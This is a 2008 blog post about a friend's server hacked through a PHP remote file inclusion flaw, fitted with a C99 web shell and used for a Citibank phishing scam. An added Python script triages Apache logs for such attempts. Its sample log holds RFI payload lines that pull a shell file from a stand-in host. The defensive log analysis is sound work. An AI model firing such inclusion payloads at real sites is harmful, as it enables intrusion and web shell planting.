Posts Tagged ‘security’

website hacked and used for phishing scam

November 26, 2008

Yesterday one of my friends called me up and said, “Hey, I am in big trouble. I don’t know when (probably a few days earlier) someone hacked my website and used it for a Citibank phishing scam, and today I got an email from the domain registrar that the domain name is suspended, because there had been several complaints of spam and the Citibank scam. Can you please log in to my server, analyse the logs and inspect when and how all this happened?”

It was horrible news for me, because it was me who helped him set up Apache virtual hosts, FTP and other stuff on his server. It’s a dedicated server running Debian Etch 4.0. After inspecting the Apache logs it became clear to me that his server was poisoned with a C99 shell script; this script was injected through a remote file inclusion vulnerability in his PHP code. For those who don’t know much about what C99 is and how Remote File Inclusion works, check this link.
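As an added example (not code from the original post), here is one way to triage an Apache access log for remote file inclusion attempts like the one described above. The log lines, the `page` parameter and the host names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Apache common/combined log prefix: host ident user [time] "request" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A query parameter whose value is itself a remote URL is the usual RFI trace.
REMOTE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_rfi_candidates(lines):
    """Return one dict per query parameter that carries a remote URL."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we can parse
        query = urlsplit(m["target"]).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            # parse_qsl decodes once; decode again to catch double encoding
            decoded = unquote(value)
            if REMOTE_RE.match(value) or REMOTE_RE.match(decoded):
                hits.append({"host": m["host"], "time": m["time"],
                             "param": name, "value": decoded,
                             "status": int(m["status"])})
    return hits

# Constructed sample log (documentation IP ranges, hypothetical "page" parameter)
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Nov/2008:10:14:01 +0000] "GET /index.php?page=about HTTP/1.1" 200 2301',
    '198.51.100.7 - - [20/Nov/2008:10:15:32 +0000] "GET /index.php?page=http://example.invalid/shell.txt? HTTP/1.1" 200 5120',
    '198.51.100.7 - - [20/Nov/2008:10:15:40 +0000] "GET /index.php?page=http%3A%2F%2Fexample.invalid%2Fshell.txt HTTP/1.1" 200 5120',
    '203.0.113.5 - - [21/Nov/2008:02:03:04 +0000] "GET /index.php?page=hTTp%253A%252F%252Fexample.invalid%252Fshell.txt HTTP/1.1" 404 -',
    '192.0.2.10 - - [21/Nov/2008:09:00:00 +0000] "GET /contact.php?name=Bob&site=none HTTP/1.1" 200 812',
    'this line is not an access-log entry',
]

if __name__ == "__main__":
    for hit in find_rfi_candidates(SAMPLE_LOG):
        # A 200 on such a request deserves attention first: the include may have worked
        print(hit["time"], hit["host"], hit["status"], hit["param"], hit["value"])
```

Parameters that legitimately carry URLs (redirect targets, for instance) will also match, so treat each hit as a lead to check against the PHP code rather than as proof of compromise.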

It’s really ridiculous if your website gets hacked and is being used for a scam, so after a little searching I found some interesting articles/posts explaining possible ways to protect your website from such vulnerabilities. If you are running a website you must check out these links.

Moreover, I will greatly appreciate it if you have any advice/tips/stories to share 🙂